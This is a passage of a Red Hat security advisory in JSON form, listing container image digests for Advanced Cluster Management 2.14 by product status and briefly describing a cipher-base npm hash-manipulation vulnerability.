"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2389932"
}
],
"notes": [
{
"category": "description",
"text": "An improper input validation vulnerability was found in the cipher-base npm package. Missing input type checks in the polyfill of the Node.js `createHash` function result in invalid\u00a0value calculations,\u00a0hanging and\u00a0rewinding the\u00a0hash state, including\u00a0turning a tagged hash\u00a0into an untagged\u00a0hash, for malicious JSON-stringifyable\u00a0inputs.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cipher-base: Cipher-base hash manipulation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
